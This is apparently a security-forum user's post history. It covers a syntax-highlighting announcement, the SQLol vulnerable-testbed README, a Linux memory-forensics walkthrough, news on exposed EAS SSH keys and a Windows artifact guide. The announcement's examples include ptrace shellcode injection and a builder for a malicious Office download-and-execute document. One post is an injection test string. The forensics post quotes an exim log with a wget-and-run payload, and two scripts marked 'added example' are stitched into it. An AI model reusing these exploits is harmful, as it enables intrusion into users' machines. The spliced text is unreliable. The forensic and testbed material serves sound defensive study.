Everything posted by Nytro
-
Tested on Firefox, Chrome and IE and it works fine. Yes, it should appear colored; for me everything is fine. See Tools > Developer > Web Console and the JS or Net errors. PS: ONLY THE RST THEME! It does not work on the Default theme, for now.
-
This is the first attempt at putting syntax highlighting on the forum. I hope it is ok. For now it is not fully functional: in Edit Post/Quick reply, posts will not appear colored; I hope to fix that tomorrow.

How to use it: [language] CODE [/language]

Where language can be:
- Java
- Cpp
- Bash
- CSharp
- CSS
- Delphi
- Diff
- JS
- Perl
- Plain
- Python
- SQL
- VB
- XML

For PHP use "phpcode"; PHP already exists in vBulletin.

Example (without spaces):
[ CPP ]
#include "stdio.h"
int main() { puts("Syntax highlight!"); return 0; }
[ /CPP ]

Result:
#include "stdio.h"
int main() { puts("Syntax highlight!"); return 0; }

Real examples:

CPP:
void putcode(unsigned long * dst)
{
    char buf[MAXPATHLEN + CODE_SIZE];
    unsigned long * src;
    int i, len;

    memcpy(buf, cliphcode, CODE_SIZE);
    len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
    if (len == -1)
        fatal("[-] Unable to read /proc/self/exe");

    len += CODE_SIZE;
    buf[len++] = '\0';

    src = (unsigned long*) buf;
    for (i = 0; i < len; i += 4)
        if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
            fatal("[-] Unable to write shellcode");
}

Python:
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in the background "
time.sleep(3)
close="{}}}}}"
binme=binascii.b2a_hex(url)
file=('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\n')
textfile = open(filename , 'w')
textfile.write(file.decode('base64')+binme+close)
textfile.close()
time.sleep(3)
print "enjoy"

There may be other problems too; check that everything is in order and post here if there is a problem.
-
Hack in paris 2013 - analysis of a windows kernel vulnerability
Nytro replied to Matt's topic in Video tutorials
Yes, I saw it, this is the real shit! -
SQLol
Released at Austin Hackers Association meeting 0x3f
Daniel Crowley <dcrowley@trustwave.com>
http://www.trustwave.com

INTRODUCTION
============

***WARNING: SQLol IS INTENTIONALLY VULNERABLE. DO NOT USE ON A PRODUCTION WEB SERVER. DO NOT EXPOSE SQLol IN AN UNTRUSTED ENVIRONMENT.***

SQLol is a configurable SQL injection testbed. SQLol allows you to exploit SQL injection flaws, but furthermore allows a large amount of control over the manifestation of the flaw.

To better understand why SQLol exists, please read the sonnet below:

I humbly posit that the current state
(With much respect to work which does precede)
Of test-beds made with vulns to demonstrate
Is lacking some in flexibility.
Two options are presented present-day,
As far as when one deals with S-Q-L:
A blind injection (bool or time delay)
And UNION statement hax (oh gee, how swell…)
Imagine we could choose how queries read
And how our input sanitizes, oh!
How nimble and specific we could be
To recreate our ‘sploit scenarios.
And thus is S-Q-L-O-L conceived:
That we can study how to pwn DBs.

Options:
- Type of query
- Location within query
- Type and level of sanitization
- Level of query output
- Verbosity of error messages
- Visibility of query
- Injection string entry point

Other cool things:
- Reset button
- Challenges
- Support for multiple database systems

REQUIREMENTS
============

PHP 5.x
Web server
Database server (MySQL, PostgreSQL and SQLite have been tested, others may work)
ADODB library (included)

USAGE
=====

Place the SQLol source files on your Web server and open in a Web browser. Modify the configuration file #sqlol_directory#/includes/database.config.php to point to your installed database server. Use the resetbutton.php script to write the SQLol database, then start playing!

COPYRIGHT
=========

SQLol - A configurable SQL injection testbed
Daniel "unicornFurnace" Crowley
Copyright © 2012 Trustwave Holdings, Inc.

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>

Download: https://github.com/SpiderLabs/SQLol
-
The most powerful computer virus in history attacks the USA and Europe
Nytro replied to livestyle's topic in Security news
Yes, it's slick -
', null, 123, null); alert('Pufuleti');
-
Within the time available...:
1. Two-factor auth
2. Self-signed certificate validation
-
Too complex, I was only interested in the NTLM algorithm.
-
Getting Started with Linux Memory Forensics
Posted by Chad Tilbury
Filed under Linux IR, Memory Analysis, Volatility

Like many of you, I have been watching the development of memory forensics over the last two years with a sense of awe. It is amazing how far the field has come since the day Chris Betz, George Garner and Robert-Jan Moral won the 2005 DFRWS forensics challenge. Of course, similar to other forensic niches, the majority of progress has been made on Windows memory forensics. There is good reason for this. Memory can be extremely fickle, with layouts and structures changing on a whim. As an example, the symbols file for Windows 7 SP1 x86 is 330MB, largely due to it needing to support major changes that can occur in every service pack and patch. The fact that we have free tools such as Volatile Systems Volatility and Mandiant Redline supporting memory images of arbitrary size from (nearly) every modern version of Windows is nothing short of miraculous.

Nowhere is it more obvious how far the memory analysis field has come than looking at the recent innovations in Mac and Linux memory forensics. Examiners of these less popular platforms have had to sit patiently for years as Windows memory forensics moved from being feasible for OS internals experts to being approachable for the masses. Against all odds, Linux memory analysis has recently seen rapid innovations. If support for the various Windows versions came slowly, imagine the complexity posed by the myriad flavors of Linux and the long list of possible kernel versions. It turns out that the Volatility framework is particularly well suited to tackle this Hydra, with its abstraction layers facilitating everything from different image formats to swappable OS profiles to rapid plugin development.

Getting Started — SVN Checkout

I recommend upgrading to (at least) version 2.3 of Volatility when getting familiar with Linux memory. The 2.3 plugins are still in beta, but there have been some significant improvements that greatly facilitate analysis. Adding the latest version is easy via Subversion checkout. For instance, in the SANS SIFT workstation, you can run the following commands:

mkdir /usr/local/src/vol2.3-dev
svn checkout http://volatility.googlecode.com/svn/branches/2.3-devel /usr/local/src/vol2.3-dev/
ln -s /usr/local/src/vol2.3-dev/vol.py /usr/local/bin/voldev.py
voldev.py --info

Creating a profile

The only significant hurdle to performing Linux memory analysis in Volatility is the requirement to create a bespoke profile for the flavor of Linux with which you are working. Creating a profile is surprisingly easy -- a great testament to the flexibility of the framework. If you work in a pseudo-homogeneous environment you may only need to pre-build a few profiles to cover the systems you are likely to encounter. If you don't have the luxury of pre-building profiles, the steps can easily be scripted and included in your incident response scripts (run after memory acquisition, substituting the Subversion checkout of Volatility with just the files necessary to run the "make" command). The Volatility wiki does an excellent job of describing the profile creation process, and the default Volatility SVN checkout contains the tools you need.

In my case, I was interested in working with an older version of Debian because I wanted to redo Challenge 7 of the Honeynet Project Forensic Challenge 2011. While 2011 isn't that long ago, it might as well be ancient times for fast moving Linux distributions. Getting a running copy of the Debian 5 (Lenny) distribution took a few more steps than would ordinarily have been required of a more modern distribution. Here was my process:

1. Download the correct distribution, being mindful of kernel version and architecture. Run "uname -a" or read the dmesg log on a live system. If you only have a memory image, strings can identify the correct distribution and kernel version. The system type for the Honeynet challenge was Debian 5, 2.6.26 kernel, x86.
2. Install the distribution into a virtual machine (VM). Due to the age of the distribution, the default update mirrors were no longer supported. This required modifying /etc/apt/sources.list to point to the archive servers. The repository misalignment resulted in a very minimal Linux install. With apt now pointing to the correct archive, I ran apt-get update and apt-get install debian-archive-keyring to include some of the basic packages. Watch for attempts by the distribution to auto-upgrade (and do not run apt-get upgrade).
3. Install Subversion in the VM and download Volatility:
   apt-get install subversion-tools
   svn checkout (Volatility trunk, revision 3452) /usr/local/src/volatility/
4. Create the kernel data structures file using dwarfdump. My minimal installation required several additional packages:
   apt-get install make
   apt-get install linux-headers-$(uname -r)
   apt-get install dwarfdump
   cd /usr/local/src/volatility/tools/linux/ && make
5. Locate the kernel symbol file. In this case the full path was /boot/System.map-2.6.26-2-686.
6. Zip up your results and move to your forensic workstation. The final result should be a module.dwarf file and a "System.map" symbol file located within a zip archive. This zip archive must be copied to the overlays/linux folder within the Volatility distribution you intend to use. The --info command will display all recognized profiles.

Starting the Analysis

I found the 2011 Honeynet Challenge interesting because the winner, Dev Anand, and several others successfully used early versions of Linux memory analysis to help solve it. I was interested in gauging how far the state of the art had progressed since then.
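The profile-creation steps above (make in tools/linux, locate /boot/System.map-<release>, zip both files into overlays/linux) as a script suitable for an incident response kit. This is an added example, not code from the post or from the Volatility project; the tools/linux and overlays/linux paths are assumed from the checkout layout described above, and the init_task check is an added sanity test on the symbol file.

```python
"""Package a Volatility 2.3 Linux profile (module.dwarf + System.map) after the make step.

Added example, not code from the blog post or from the Volatility project.
Assumptions: module.dwarf is produced by running `make` in the Volatility
tools/linux directory; the kernel symbol file is /boot/System.map-<release>;
the destination is the overlays/linux directory of the Volatility checkout
used for analysis. All paths are passed in, so the packaging step needs no root.
"""
import os
import re
import subprocess
import zipfile

# A System.map line looks like "c0100000 T _text": address, symbol type, symbol name.
SYSMAP_LINE = re.compile(r"^[0-9a-fA-F]{8,16} [A-Za-z] \S+$")


def find_system_map(boot_dir, kernel_release):
    """Return <boot_dir>/System.map-<release> if it exists, else None."""
    path = os.path.join(boot_dir, "System.map-" + kernel_release)
    return path if os.path.isfile(path) else None


def validate_system_map(path):
    """Check that every line parses and that init_task is present.

    init_task is the kernel's first task_struct; the Linux process plugins
    walk the task list from it, so a map without it is useless for analysis.
    """
    saw_init_task = False
    with open(path, "r", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            line = line.rstrip("\n")
            if not SYSMAP_LINE.match(line):
                raise ValueError("bad System.map line %d: %r" % (lineno, line))
            if line.endswith(" init_task"):
                saw_init_task = True
    return saw_init_task


def build_module_dwarf(tools_linux_dir):
    """Run `make` in volatility/tools/linux (needs kernel headers and dwarfdump installed)."""
    subprocess.run(["make"], cwd=tools_linux_dir, check=True)
    dwarf = os.path.join(tools_linux_dir, "module.dwarf")
    if not os.path.isfile(dwarf):
        raise FileNotFoundError("make did not produce module.dwarf")
    return dwarf


def package_profile(module_dwarf, system_map, overlays_linux_dir, profile_name):
    """Zip module.dwarf and the System.map into overlays/linux/<profile_name>.zip.

    --info lists the profile under a name derived from the zip's base name,
    so pick something descriptive, e.g. Debian5_2.6.26-2-686.
    """
    if not validate_system_map(system_map):
        raise ValueError("init_task not found in %s" % system_map)
    os.makedirs(overlays_linux_dir, exist_ok=True)
    out = os.path.join(overlays_linux_dir, profile_name + ".zip")
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(module_dwarf, arcname="module.dwarf")
        zf.write(system_map, arcname=os.path.basename(system_map))
    return out


def profile_members(zip_path):
    """List the files inside a profile zip (what Volatility will load from it)."""
    with zipfile.ZipFile(zip_path) as zf:
        return sorted(zf.namelist())


if __name__ == "__main__":
    # Typical use on the live VM, after memory acquisition (assumed paths).
    release = os.uname().release
    sysmap = find_system_map("/boot", release)
    if sysmap is None:
        raise SystemExit("no System.map for kernel " + release)
    dwarf = build_module_dwarf("/usr/local/src/volatility/tools/linux")
    overlays = "/usr/local/src/vol2.3-dev/volatility/plugins/overlays/linux"
    print(package_profile(dwarf, sysmap, overlays, "Profile_" + release))
```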
Simply put, the Volatility project has truly taken Linux analysis to the next level, with 40 plugins in version 2.3 providing vast capabilities that simply did not previously exist. Many of the questions that previously required access to the system disk can now be answered just as easily from the memory image. I'll use the challenge to demonstrate some of the plugins.

linux_netstat

Processes and network connections are the first things I review when starting analysis of a new memory image. In this case the linux_netstat plugin identifies two interesting established connections to IP address 192.168.56.1 using ports 4444 and 8888. The connections are tied to processes named "sh" and "nc". Further, we see a couple of interesting listening daemons: sshd on port 22 and exim4 on port 25.

linux_psaux

The linux_psaux plugin augments the standard process listing with command line information. While not terribly helpful here, the output does tend to reinforce that "nc" may in fact be a netcat binary.

NOTE: You only need to set the VOLATILITY_PROFILE environment variable once, but it is included in each of the examples as a reminder that the demonstrated plugins require a Linux profile variable set or included via the --profile parameter.

linux_yarascan

The Volatility yarascan plugins for Windows, Mac, and now Linux leverage open-source yara signatures to provide a simple and powerful means to search user and kernel memory. In this example I was simply looking for the suspicious IP address string from the linux_netstat command, but keep in mind that an entire rules file could have been used. The first hit (found within process rsyslogd) could be a partial log entry related to a SSH login, which should be possible to verify within the /var/log/auth.log. This log could be found and exported using the linux_find_file Volatility plugin, but, in this case, it does not appear to be resident in memory. A review of the auth.log on disk shows several related failed logins from 192.168.56.1 via SSH:

Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2

The second and third yarascan hits displayed look like commands or related output. Since the hits were found in the bash process (PID 2042), the bash command line history would be worth reviewing.

linux_bash

The linux_bash plugin is a particularly impressive plugin as it carves out individual bash history entries and reassembles them for analysis. If bash history exists, it can provide a very in-depth view into user activity. In this case we see a lot of strange activity surrounding the exim server as well as attempts to copy the entire sda drive, sda1 partition and memory over to the suspicious IP addresses. A challenge in this investigation would be differentiating legitimate system administration actions from hacker activity. Given the manipulations surrounding exim, a logical next step might be to review the exim logs in /var/log/exim4. The /var/log/exim4/mainlog recorded several errors referencing the previously discovered suspicious IP address and ports as well as multiple wget attempts to download files into the /tmp folder:

2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL <root@local.com>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000'"}} ${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}} ...

linux_dentry_cache

To improve file system performance, Linux caches directory entries and inode information as files are opened. The linux_dentry_cache Volatility plugin returns the contents of the directory entry cache, giving examiners a detailed view of the most recently referenced files in the file system. In this case, I used the plugin in an attempt to identify whether the attacker succeeded in downloading tools to the /tmp directory. It appears that the attacker was eventually successful in retrieving the c.pl file. Further, the rk.tar archive looks interesting and should be analyzed.

Conclusion

Linux memory forensics has definitely come of age, and I highly recommend including it in your incident response process. Volatility makes it easy to get started. You can find the memory image demonstrated here at the Honeynet Project and download the Debian profile created for this post here. When you are done working with that image, Raytheon SecondLook provides a large selection of both clean and infected memory images. Finally, as you create new Linux profiles, please consider donating them back to the Volatility Linux profiles page.

Source: Getting Started with Linux Memory Forensics
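The auth.log and exim mainlog entries quoted in the post, run through a small triage parser that pulls out the ${run{...}} expansion abuse, the staged download and the source addresses, and correlates them with the failed SSH logins. This is an added example, not part of the original post; the two sample lines are constructed from the entries shown above, and the field layout follows those lines rather than a full exim/sshd log grammar.

```python
"""Triage exim mainlog and sshd auth.log lines for the ACL-expansion abuse seen in the post.

Added example, not part of the original post. SAMPLE_EXIM and SAMPLE_AUTH are
constructed from the log entries quoted in the write-up.
"""
import re

# exim4 mainlog: "<date> <time> H=(<helo>) [<ip>] ... failed to expand ACL string "<string>""
EXIM_REJECT = re.compile(
    r'^(?P<ts>\S+ \S+) H=\((?P<helo>[^)]*)\) \[(?P<ip>[0-9.]+)\].*?'
    r'failed to expand ACL string "(?P<acl>.*)"$'
)
# The injected string carries ${run{<command>}}; capture the command exim was asked to run.
RUN_EXPANSION = re.compile(r"\$\{run\{(?P<cmd>.*?)\}\}")
URL = re.compile(r"https?://[^\s'\";]+")
WGET_OUT = re.compile(r"wget\s+\S+\s+-O\s+(?P<dest>[^\s;]+)")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# sshd auth.log: "sshd[<pid>]: Failed <method> for [invalid user ]<user> from <ip> port <port>"
SSH_FAILED = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Failed (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from\s*(?P<ip>[0-9.]+) port (?P<port>\d+)"
)


def parse_exim_line(line):
    """Describe a rejected MAIL whose ACL string failed to expand, or return None."""
    m = EXIM_REJECT.match(line.strip())
    if not m:
        return None
    acl = m.group("acl")
    cmds = [r.group("cmd") for r in RUN_EXPANSION.finditer(acl)]
    return {
        "ts": m.group("ts"),
        "src_ip": m.group("ip"),
        "helo": m.group("helo"),
        "run_expansion": bool(cmds),          # ${run{}} in a MAIL FROM is never legitimate
        "commands": cmds,
        "urls": sorted(set(URL.findall(acl))),
        "dropped_files": [w.group("dest") for w in WGET_OUT.finditer(acl)],
    }


def parse_ssh_failure(line):
    """Return (user, ip, port) for a failed sshd login line, or None."""
    m = SSH_FAILED.search(line)
    if not m:
        return None
    return m.group("user"), m.group("ip"), int(m.group("port"))


def triage(exim_lines, auth_lines):
    """Correlate both logs: hosts named inside injected commands that also failed SSH logins."""
    exim_hits = [e for e in map(parse_exim_line, exim_lines) if e and e["run_expansion"]]
    ssh_fail = [s for s in map(parse_ssh_failure, auth_lines) if s]
    ips_in_cmds = set()
    for e in exim_hits:
        for cmd in e["commands"]:
            ips_in_cmds.update(IPV4.findall(cmd))
    ssh_ips = {s[1] for s in ssh_fail}
    return {
        "exim_hits": exim_hits,
        "ssh_failures": ssh_fail,
        "overlap": sorted(ips_in_cmds & ssh_ips),
    }


# Constructed samples, based on the entries quoted in the post.
SAMPLE_EXIM = [
    '2011-02-06 15:08:13 H=(abcde.com) [192.168.56.101] temporarily rejected MAIL '
    '<root@local.com>: failed to expand ACL string "pl 192.168.56.1 4444; sleep 1000000\'"}} '
    '${run{/bin/sh -c "exec /bin/sh -c \'wget http://192.168.56.1/c.pl -O /tmp/c.pl;'
    'perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000\'"}}"',
]
SAMPLE_AUTH = [
    "Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses "
    "from 192.168.56.1 port 44616 ssh2",
]

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_EXIM, SAMPLE_AUTH), indent=2))
```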
-
Root SSH Key Shipping with Emergency Alert System Devices Exposed
by Michael Mimoso

Firmware images for the application servers that distribute messages for the Emergency Alert System in the United States are shipping with a private root SSH key that has been disclosed. Hackers who have this key can access one of these servers and interrupt or manipulate an EAS message.

The EAS is a system that enables, in a worst-case scenario, the president to speak to the nation within 10 minutes of a disaster over radio and television. In February, ENDEC machines at a Montana television station were accessed by hackers and broadcast a phony emergency alert warning of a zombie apocalypse.

DHS’ ICS-CERT issued an alert last week warning that Digital Alert Systems’ DASDEC and Monroe Electronics One-Net E189 EAS devices were shipping a compromised shared private root SSH key in publicly available firmware images. The vulnerabilities in the DASDEC application servers were reported by IOActive principal research scientist Mike Davis. The servers authenticate EAS messages and interrupt broadcasts with the familiar alert tone that accompanies emergency messages.

“These DASDEC application servers are currently shipped with their root privileged SSH key as part of the firmware update package. This key allows an attacker to remotely log on in over the Internet and can manipulate any system function,” Davis said in a statement. “For example, they could disrupt a station’s ability to transmit and could disseminate false emergency information. For any of these issues to be resolved, we believe that re-engineering needs to be done on the digital alerting system side and firmware updates to be pushed to all appliances.”

The compromised SSH keys ship in the firmware images for the Linux-based DASDEC-I and DASDEC-II appliances. An attacker can use the key to log in over the Internet and impact emergency messages delivered to an undetermined number of locations and stations. Depending on the device configuration, IOActive said, manipulated messages could be sent to other DASDEC systems.

According to an IOActive advisory, the publicly available SSH key can be removed only by a root privileged user on the server. An attacker with access can also view the server logs, which include machine information, administrator data and other sensitive data.

In addition, DHS CERT said the administrative Web server generates predictable session ID passwords that could also allow an attacker to own an admin dashboard. The DASDEC and One-Net ENDEC machines also ship with default administrative credentials that some sites neglect to change.

As far as mitigations go, Monroe Electronics and Digital Alert Systems updated their firmware in April, disabling the compromised SSH key. There are also simplified means of installing new unique keys and a new password policy.

Until a new image is obtained and installed, users are urged to disable the compromised root SSH key immediately, especially if the device is Web-enabled. DHS CERT said that if users are unable to replace the SSH root key, they should restrict access to trusted hosts and networks, and change all default passwords.

Source: EAS Devices Shipping with Compromised Root SSH Key | Threatpost
-
[h=3]HowTo: Determine Program Execution[/h] Sometimes during an examination, it can be important to determine what programs have been executed on a system, and more specifically, when and by which user. Some of the artifacts on a system will provide us with indications of programs that have been executed, while others will provide information about which user launched the program, and when. As such, some of this information can be included in a timeline. Hopefully, something that will become evident throughout this post, as well as other HowTo posts, is that rather than focusing on individual artifacts, we're going to start putting various artifacts into "buckets" or categories. The purpose for doing this is so that analysts don't get lost in a sea of artifacts, and are instead able to tailor their initial approach to an examination, possibly using an analysis matrix. Okay, let's get started... AutoStart Locations Before we begin to look at the different artifacts that can be directly tied to a user (or not), I wanted to briefly discuss autostart locations. These are locations within the system...file system, Registry...where references to programs can reside that allow programs to be executed automatically, without any interaction from the user beyond booting the system or logging in. There are a number of such locations and techniques that can be used...Registry autostart locations, including the ubiquitous Run key, Windows services, the StartUp folder on the user's Program Menu, and even the use of the DLL Search Order functionality/vulnerability. Each of these can be (and have been) discussed in multiple blog posts, so for now, I'm simply going to present them here, under this "umbrella" heading, for completeness. Scheduled Tasks can be, and are, used as an autostart location. 
Many of us may have QuickTime or iTunes installed on our system; during installation, a Scheduled Task to check for software updates is created, and we see the results of this task now and again. Further, on Windows 7 systems, a Scheduled Task creates backups of the Software, System, Security, and SAM hive files into the C:\Windows\system32\config\RegBack folder every 10 days. When considering autostart locations, be sure to check the Scheduled Tasks folder. Tip On a live system, you need to use both the schtasks.exe and at.exe commands to get a complete listing of all of the available Scheduled Tasks. Tools: RegRipper plugins, MS/SysInternals AutoRuns; for XP/2003 Scheduled Task *.job files, jobparse.pl; on Vista+ systems, the files are XML User There are a number of artifacts within the user context that can indicate program execution. This can be very useful, as it allows analysts to correlate program execution to the user context in which the program was executed. UserAssist The contents of value data within a user's UserAssist subkeys can provide an excellent view into what programs the user has launched via the Explorer shell...by double-clicking icons or shortcuts, as well as by navigating via the Program Menu. Most analysts are aware that the value names are Rot-13 encoded (and hence, easily decoded), and folks like Didier Stevens have gone to great lengths to document the changes in what information is maintained within the value data, as versions of the operating systems have progressed from Windows 2000 to Windows 8. Tools: RegRipper userassist.pl and userassist_tln.pl plugins RunMRU When a user clicks on the Start button on their Windows XP desktop, and then types a command into the Run box that appears, that command is added to the RunMRU key. Interestingly, I have not found this key to be populated on Windows 7 systems, even though the key does exist. 
For example, I continually use the Run box to launch tools such as RegEdit and the calculator, but when I dump the hive file and run the runmru.pl RegRipper plugin against it, I don't see any entries. I have found the same to be true for other hives retrieved from Windows 7 systems. Tools: RegRipper runmru.pl plugin ComDlg32\CIDSizeMRU Values The binary values located beneath this key appear to contain names of applications that the user recently launched. From my experience, the majority of the content of these values, following the name of the executable file, is largely zeros, with some remnant data (possibly window position/size settings?) at the end of the file. As one of the values is named MRUListEx, we can not only see (via a timeline) when the most recent application was launched, but we can also see when other applications were launched by examining available VSCs. AppCompatFlags According to MS, the Program Compatibility Assistant is used to determine if a program needs to be run in XP Compatibility Mode. Further, "PCA stores a list of programs for which it came up...even if no compatibility modes were applied", under the Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted key in the user's NTUSER.DAT hive. As such, we can query these values and retrieve a list of programs run by the user. Tools: RegRipper appcompatflags.pl plugin (I updated the plugin, originally written by Brendan Cole, to include retrieving the values beneath the Persisted key, on 6 July 2013; as such, the plugin will be included in the next rollout) MUICache The contents of this key within the user hives (NTUSER.DAT for XP/2003, USRCLASS.DAT for Win7) often contains references to applications that were launched within the user context. Often times, these application will include command line interface (CLI) utilities. Windows shortcuts/LNK files and Jump Lists You're probably thinking..."huh?" 
Most analysts are familiar with how shortcuts/LNK files (and Jump Lists) can be used to demonstrate access to files or external storage devices, but they can also be used to demonstrate program execution within the context of a user. Most of us are familiar with the LNK files found in the ..\Windows\Recent and ..\Office\Recent folders within the user profile...so, think about how those shortcuts are created. What usually happens is that the user double-clicks a file, the OS will read the file extension from the file, and then query the Registry to determine which application to launch in order to open the file. Windows will then launch the application...and this is where we have program execution. Many times when a user installs an application on their system, a desktop shortcut may be created so that the user can easily launch the application. The presence of the desktops icon may indicate that the user launched an installer application, and Tools: custom Perl script, tools to parse LNK files Java Deployment Cache Index (*.idx) Files The beginning of 2013 saw a lot of discussion about vulnerabilities to Java, as well as reports of 0-days, and as a result, there was a small number of folks within the community looking into the use of Java deployment cache index (*.idx) files during analysis. The use of these files as artifacts during an investigation goes back to well before then, thanks to Corey Harrell. These files provide indications of downloads to the system via Java, and in some cases, those downloads might be malicious in nature. These artifacts are related specifically to Java being executed, and may lead to indications of additional programs being executed. Further, given that the path to the files is within the user profile folder, we can associate the launch of Java with a specific user context. 
Tools: idxparse.pl parser Browser History A user's browser history not only indicates that they were browsing the web (i.e., executing the browser program), but the history can also be correlated to the *.idx files discussed above in order to determine which site they were visiting that caused Java to be launched. System There are a number of artifacts on the system that can provide indications of program execution Prefetch File Analysis Most analysts are aware of some of the metadata found within Prefetch files. Application prefetch files include metadata indicating when the application was last launched, as well as how many times it has been launched. This can provide some excellent information Tools: pref.pl, or any other tools/scripts that parse the embedded module strings. Recent versions of scripts I've written and use incorporate an alerting mechanism to identify items within the strings and string paths found to be "suspicious" or "unusual". AppCompatCache This value within the System hive in the Registry was first discussed publicly by Mandiant, and has proven to be a treasure trove of information, particularly when it comes to malware detection and determining program execution, in general. Tools: Mandiant's shim cache parser, RegRipper appcompatcache.pl plugin (appcompatcache_tln.pl plugin outputs in TLN format, for inclusion in timelines). Legacy_* Keys Within the System hive, most of use are familiar with the Windows services keys. What you may not realize is that there is another set of keys that can be very valuable when it comes to understanding when Windows services were run...the Enum\Root\Legacy_* keys. Beneath the ControlSet00n\Enum\Root key in the System hive, there are a number of subkeys whose names being with LEGACY_, and include the names of services. 
There are a number of variants of malware (Win32/Alman.NAD, for example) that install as a service, or driver, and when launched, the operating system will create the Enum\Root\Legacy_* key for the service/driver. Also, these keys persist after the service or driver is no longer used, or even removed from the system. Malware writeups by AV vendors will indicate that the keys are created when the malware is run (in a sandbox), but it is more correct to say that the OS creates the key(s) automatically as a result of the execution of the malware. This can be an important distinction, which is better addressed in another blog post. Tools: RegRipper legacy.pl plugin Direct* and Tracing Keys These keys within the Software hive can provide information regarding program execution. The "Direct*" keys are found beneath the Microsoft key, and are keys whose names start with "Direct", such as Direct3D, DirectDraw, etc. Beneath each of these keys, you may find a MostRecentApplication key, which contains a value named Name, the data of which indicates an application that used the particular graphics functionality. Many times during an exam, I'll see "iexplore.exe" listed in the data, but during one particular exam, I found "DVDMaker.exe" listed beneath the DirectDraw key. In another case, I found "mmc.exe" listed beneath the same key. I've found during exams that the Microsoft\Tracing key contains references to some applications that appear to have networking capabilities. I do not have any references to provide information as to which applications are subject to tracing and appear beneath this key, but I have found references to interesting applications that were installed on systems, such as Juniper and Kiwi Syslog tools (during incident response engagements, this can be very helpful and allow you collect Event Logs from the system that have since been overwritten, and included in a timeline...). 
Unfortunately, these artifacts have nothing more than the EXE name (no path or other information is included or available), but adding the information to a timeline can provide a bit of context and granularity for analysis.

Tip: When examining these and other keys, do not forget to check the corresponding key beneath the Wow6432Node key within the Software hive. The RegRipper plugins address this automatically.

Tools: RegRipper direct.pl and tracing.pl plugins

Event Logs

Service Control Manager events within the System Event Log, particularly those with event IDs 7035 and 7036, provide indications of services that were successfully sent controls, for either starting or stopping the service. Most often within the System Event Log, you'll see these types of events clustered around a system start or shutdown. During DFIR analysis, you're likely going to be interested in either oddly named services, services that only appear recently, or services that are started well after a boot or system startup. Also, you may want to pay close attention to services such as "PSExeSvc", "XCmdSvc", "RCmdSvc", and "AtSvc", as they may indicate lateral movement within the infrastructure.

On Windows 2008 R2 systems, I've found indications of program execution in the Application Experience Event Logs; specifically, I was examining a system that had been compromised via an easily-guessed Terminal Services password, and one of the intruders had installed Havij (and other tools) on the system. The Application-Experience/Program-Inventory Event Log contained a number of events associated with program installation (event IDs 903 and 904), application updates (event ID 905), and application removal (event IDs 907 and 908). While this doesn't provide a direct indication of a program executing, it does illustrate that the program was installed, and that an installer of some kind was run.

On my own Windows 7 system, I can open the Event Viewer, navigate to the Event Log, and view the records that illustrate when I have installed various programs knowingly (FTK Imager) and unknowingly (Google+ Chat). There are even a number of application updates to things like my ActiveState Perl and Python installations.

Tools: LogParser, evtxparse.pl

Other Indirect Artifacts

Many times, we may be able to determine program execution through the use of indirect artifacts, particularly those that persist well after the application has finished executing, or even been deleted. Many of the artifacts that we've discussed are, in fact, indirect artifacts, but there may still be others available, depending upon the program that was executed.

A number of years ago, I was...and I don't like to admit this...certified to perform PCI forensic audits. On one case, I ran into my first instance of a RAM scraper...this was a bit of malware that was installed on a point-of-sale (POS) back office server (running Windows) as a Windows service. After the system was booted, this instance of the malware would read the contents of a register, do some math, and use that value as a seed to wait a random amount of time before waking up and dumping the virtual memory from one of eight named (the names were listed in the executable file) processes. The next step was to parse the memory dump for track data, and this was accomplished via the use of a Perl script that was "compiled" via Perl2Exe. I'm somewhat familiar with such executables, and one of the artifacts we found to validate our findings with respect to the actual execution of the malicious code was the temporary directories created by the "compiled" script. When executables "compiled" with Perl2Exe are run, any of the Perl modules (including the runtime) packed into the executable are extracted as DLLs into a temporary directory, at which time they are "available" to the running code.

As the code was launched by a Windows service, the "temp" directories were found in the C:\Windows\Temp folder. The interesting thing that we found was that the temp directories used to hold the modules/DLLs are not deleted after the code completes, and they persist even if the program itself is removed from the system. In short, we had a pretty good timeline for each time the parsing code was launched.

On my own Windows 7 system, because I run a number of Perl scripts that were "compiled" with Perl2Exe within the context of my user account, the temp directories are found in the path C:\Users\harlan\AppData\Local\Temp...the subdirectories themselves are named "p2xtmp-", followed by an integer, and themselves contain subdirectories that represent the Perl runtime namespace. The time stamps (creation dates) for these subdirectories provide indications of when I executed scripts that had been compiled via Perl2Exe.

Memory Dumps

During dead box analysis, memory dumps can be an excellent source of information. When an application crashes, a memory dump is created, and a log file containing information, including a process list, is also created. When another application crash occurs, the memory dump is overwritten, but the log file is appended to, meaning that you can have a number of crash events available for analysis. I have found this historical information to be very useful during examinations because, while the information is somewhat limited, it can illustrate whether or not a program was running at some point in the past.

